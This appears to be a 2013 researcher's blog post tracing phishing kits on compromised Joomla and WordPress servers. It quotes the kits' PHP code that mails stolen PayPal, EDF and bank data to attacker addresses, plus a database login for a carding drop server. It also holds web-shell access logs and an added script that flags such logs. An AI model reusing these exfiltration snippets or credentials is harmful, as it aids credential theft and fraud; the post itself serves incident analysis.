Tuesday 15 January 2013

Phish-BankFraud/PHP.Mailer/PHP.Shell

Investigation of some compromised servers used for phishing over the past two weeks (part 2 of Phishing Hunting, a bit more technical now).
The first site is gtmaustralia.com.au; phishing mirrors:
http://www.phishtank.com/phish_detail.php?phish_id=1693107
http://www.phishtank.com/phish_detail.php?phish_id=1693117
The phish targets PayPal; the compromised server runs Joomla 1.5.20 Stable Release [18-July-2010].

The hacker used a phishing redirector hosted on another compromised server running WordPress:
http://www.firstimpressionsimageconsulting.com/wp-includes/SimplePie/Decode/HTML/
VT 0/46 - VT 3/34

Several backdoors were found:
VT 21/46

And a WSO shell with obfuscated code to evade antivirus.
VT 18/46

On the server side, resend.php sends the phished data to the hacker:
$samaka = "asq01@hotmail.fr";
$subject = "Off $ip";
$from = "From: InfoRmation<google@gmail.com>";
$from .= "-Info\n";
mail($samaka,$subject,$message,$from);

The server was also used to target EDF (Électricité de France):
http://www.phishtank.com/phish_detail.php?phish_id=1693109
VT 0/46

Data is still sent via e-mail, sniper.php:
<?php $to = "wait0all@gmail.com"; $ip = getenv("REMOTE_ADDR"

Cielo targeted, VT 5/46
http://www.phishtank.com/phish_detail.php?phish_id=1693131
$headers = "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: Cielo <desejovip@hotmail.com";

And also Banco do Brasil, VT 0/46
http://www.phishtank.com/phish_detail.php?phish_id=1693133
That's a lot of phishes for just one server, and it's not finished: the server was also used for spam:
VT 0/46

VT 9/46

Now, by viewing the access logs, I suspect 41.249.93.120:
41.249.93.120 - - [01/Jan/2013:04:41:48 +1100] "GET /*********.php HTTP/1.1" 200 36209 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.93.120 - - [01/Jan/2013:04:39:47 +1100] "POST /media/*********/rsform_backup_2010-09-30_183530.php?x&action=upload&chdir=/home/gtmaustr/public_html/media/**************/ HTTP/1.1" 200 11887 "http
[Tue Jan 01 04:35:41 2013] [error] [client 41.249.93.120] File does not exist: /home/gtmaustr/public_html/media/*********/imagens/pontabarramarela.png, referer: http://www.gtmaustralia.com.au/media/*********/cc/css/padrao3.css
[Tue Jan 01 04:35:41 2013] [error] [client 41.249.93.120] File does not exist: /home/gtmaustr/public_html/404.shtml, referer: http://www.gtmaustralia.com.au/media/*********/cc/css/padrao3.css
69.171.247.115 - - [01/Jan/2013:10:42:23 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13565 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
41.140.27.175 - - [03/Jan/2013:04:52:00 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.248.194.138 - - [03/Jan/2013:07:01:16 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
200.140.128.46 - - [04/Jan/2013:13:46:34 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&chdir=/home/gtmaustr/public_html/media/ HTTP/1.1" 200 14111 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
41.248.111.156 - - [06/Jan/2013:03:46:30 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
196.217.22.177 - - [07/Jan/2013:01:36:17 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
201.24.48.2 - - [07/Jan/2013:08:44:05 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "http://gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&chdir=/home/gtmaustr/public_html/media/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
41.140.96.122 - - [07/Jan/2013:21:45:20 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 8643 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
105.137.51.125 - - [09/Jan/2013:01:05:07 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 15203 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
41.249.80.218 - - [10/Jan/2013:04:50:48 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 12376 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.140.101.235 - - [10/Jan/2013:08:05:29 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 16950 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
186.215.83.228 - - [10/Jan/2013:08:29:16 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=backtool&chdir=/home/gtmaustr/public_html/media/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
105.141.50.243 - - [10/Jan/2013:09:58:47 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
105.142.9.86 - - [10/Jan/2013:16:07:11 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 8607 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
105.139.10.216 - - [11/Jan/2013:01:06:34 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.115.245 - - [11/Jan/2013:02:48:02 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14371 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
69.171.237.11 - - [11/Jan/2013:03:40:37 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
41.250.159.131 - - [11/Jan/2013:03:40:38 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13565 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
41.250.159.131 - - [11/Jan/2013:03:44:24 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13613 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.24.120 - - [11/Jan/2013:08:09:05 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
177.43.16.17 - - [11/Jan/2013:09:31:47 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
105.137.137.86 - - [11/Jan/2013:13:05:31 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14216 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.143.4.42 - - [12/Jan/2013:00:45:23 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 11412 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.248.178.222 - - [12/Jan/2013:06:46:17 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14494 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.146.131 - - [12/Jan/2013:06:58:29 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14206 "-" "Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0"
105.139.9.75 - - [12/Jan/2013:12:55:20 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14369 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.137.59.63 - - [12/Jan/2013:16:18:09 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 20120 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0.1"
46.165.221.230 - - [12/Jan/2013:18:09:41 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
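
The pattern visible in the log above (PHP files answering 200 from inside /media/, POSTs to them from many addresses, a server path passed in the chdir parameter) can be searched for automatically. The following is an added example, not part of the original post: the static-directory list, the path prefixes and the reason labels are assumptions, and the sample lines are constructed in the style of the log above using documentation IP ranges.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache "combined" prefix; error-log lines do not match and are skipped.
LINE_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# Assumption: on this CMS these directories hold static assets only.
STATIC_DIRS = ("/media/", "/images/", "/wp-content/uploads/")
# Assumption: prefixes of absolute filesystem paths on the host.
SERVER_ROOTS = ("/home/", "/var/www/")

def classify(line):
    """Return (ip, path, reasons) for a suspicious successful request, else None."""
    m = LINE_RE.match(line)
    if not m or m["status"] != "200":
        return None
    url = urlsplit(m["target"])
    reasons = set()
    if url.path.lower().endswith(".php") and url.path.startswith(STATIC_DIRS):
        reasons.add("php-in-static-dir")
        if m["method"] == "POST":
            reasons.add("post-to-static-php")
    # File-manager style query: a server-side absolute path passed as a value.
    values = [v for vs in parse_qs(url.query, keep_blank_values=True).values() for v in vs]
    if any(v.startswith(SERVER_ROOTS) for v in values):
        reasons.add("server-path-in-query")
    return (m["ip"], url.path, reasons) if reasons else None

def suspicious_paths(lines):
    """Group hits by path so one script reached from many addresses stands out."""
    out = defaultdict(lambda: {"ips": set(), "reasons": set(), "hits": 0})
    for ip, path, reasons in filter(None, map(classify, lines)):
        out[path]["ips"].add(ip)
        out[path]["reasons"] |= reasons
        out[path]["hits"] += 1
    return dict(out)

# Constructed sample lines (not taken from the real log).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2013:04:30:00 +1100] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 18211 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2013:04:30:01 +1100] "GET /media/system/js/mootools.js HTTP/1.1" 200 74434 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Jan/2013:21:45:20 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 8643 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Jan/2013:08:09:05 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [07/Jan/2013:08:44:05 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "-" "Mozilla/5.0"',
    '[Tue Jan 01 04:35:41 2013] [error] [client 192.0.2.10] File does not exist: /home/gtmaustr/public_html/404.shtml',
]
if __name__ == "__main__":
    for path, info in suspicious_paths(SAMPLE).items():
        print(info["hits"], sorted(info["ips"]), sorted(info["reasons"]), path)
```

Sorting the result by number of distinct addresses per path gives a quick list of files to pull from disk and inspect.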

Second case (and probably the same guys behind it)
Phishing targeting EDF: http://www.phishtank.com/phish_detail.php?phish_id=1693105
The server is running Joomla here again.

This time, the log files were cleared.
I've posted previous info, including log files, on kernelmode. (Did they read me?)

Data is still sent via mail, index3.php:
$myemail="jinshoori@gmail.com,t0od@hotmail.fr";

loginAction.action.php:
$myemail = "jinshoori@gmail.com"; //email hna

And it was used as a spam relay here again:

The shell found this time was an edited version of Backdoor.PHP.WebShell.BD:

On a similar case I coded a tool to retrieve phishing URLs from rotators:

The server was saturated later:

Open dir:

They make different dirs with phishing pages to evade antivirus:

The last case was a PayPal phishing page found by markusg, targeting German people.
The server is running WordPress.
http://www.phishtank.com/phish_detail.php?phish_id=1694455

Not the same guys, not the same technique.
This time, the data is sent to a MySQL DB on another compromised server:
mysql_connect("193.107.19.***", "ccs", "LTBDVQ7bYewff5Dc");
mysql_select_db("ccs");
$url = mysql_real_escape_string($_S

'ccs' makes me think of 'Credit Card Sell'.
On the server where the data is sent, the hacker uses a parser for credit cards.

The server was also used for spam:
VT 5/46

The data collected is probably used to supply carding shops.

You can find more research/dumped phishing pages/spam tools/additional files here including mail source, and here for dumped backdoors.
Also interesting: Unixfreakjp has written a post about the connection between backdoors and exploit kits here
